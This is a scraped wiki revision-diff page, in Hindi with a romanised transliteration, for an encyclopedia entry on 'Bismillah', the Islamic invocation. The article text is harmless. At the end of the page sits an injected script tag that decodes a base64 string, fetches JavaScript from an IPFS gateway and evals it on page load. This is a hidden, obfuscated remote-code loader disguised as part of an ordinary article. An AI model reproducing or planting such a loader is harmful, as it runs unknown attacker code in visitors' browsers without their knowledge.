Difference between revisions of "बिस्मिल्लाह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
बिस्मिल्लाह, तस्मियाह भी कहलाता है। यह प्रार्थना, बिस्मिल्लाह अर-रहमान अर-रहीम, ‘उस [[अल्लाह]] के नाम पर है जो दयालु और करूणामय’ है। इसे सबसे पहले [[क़ुरान]] में शुरू किया गया था और यह प्रार्थना नौवें सुरा को छोड़कर हर सुरा (अध्याय) की शुरुआत में आती है। अक्सर [[मुसलमान]] महत्त्वपूर्ण कामों से पहले बिस्मिल्लाह करके अल्लाह को याद करते हैं। सभी औपचारिक दस्तावेज़ों और लेन-देन की शुरुआत में भी बिस्मिल्लाह किया जाता है। क़ानूनी तौर पर ज़रूरी कामों और वे काम, जिन्हें करने की सलाह दी गई हो, उनसे पहले भी बिस्मिल्लाह किया जाना चाहिए। इसका संक्षिप्त रूप भोजन जैसे दैनिक कामों से पहले बोला जाता है।
+
बिस्मिल्लाह, तस्मियाह भी कहलाता है। यह प्रार्थना, बिस्मिल्लाह अर-रहमान अर-रहीम, ‘उस [[अल्लाह]] के नाम पर है जो दयालु और करुणामय’ है। इसे सबसे पहले [[क़ुरान]] में शुरू किया गया था और यह प्रार्थना नौवें सुरा को छोड़कर हर सुरा (अध्याय) की शुरुआत में आती है। अक्सर [[मुसलमान]] महत्त्वपूर्ण कामों से पहले बिस्मिल्लाह करके अल्लाह को याद करते हैं। सभी औपचारिक दस्तावेज़ों और लेन-देन की शुरुआत में भी बिस्मिल्लाह किया जाता है। क़ानूनी तौर पर ज़रूरी कामों और वे काम, जिन्हें करने की सलाह दी गई हो, उनसे पहले भी बिस्मिल्लाह किया जाना चाहिए। इसका संक्षिप्त रूप भोजन जैसे दैनिक कामों से पहले बोला जाता है।
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
Line 10: Line 10:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{इस्लाम धर्म}}
 
{{इस्लाम धर्म}}
[[Category:इस्लाम धर्म]][[Category:इस्लाम धर्म कोश]]
+
[[Category:इस्लाम धर्म]][[Category:इस्लाम धर्म कोश]][[Category:धर्म कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 13:17, 21 March 2014

bismillah, tasmiyah bhi kahalata hai. yah prarthana, bismillah ar-rahaman ar-rahim, ‘us allah ke nam par hai jo dayalu aur karunamay’ hai. ise sabase pahale quran mean shuroo kiya gaya tha aur yah prarthana nauvean sura ko chho dakar har sura (adhyay) ki shuruat mean ati hai. aksar musalaman mahattvapoorn kamoan se pahale bismillah karake allah ko yad karate haian. sabhi aupacharik dastavezoan aur len-den ki shuruat mean bhi bismillah kiya jata hai. qanooni taur par zaroori kamoan aur ve kam, jinhean karane ki salah di gee ho, unase pahale bhi bismillah kiya jana chahie. isaka sankshipt roop bhojan jaise dainik kamoan se pahale bola jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>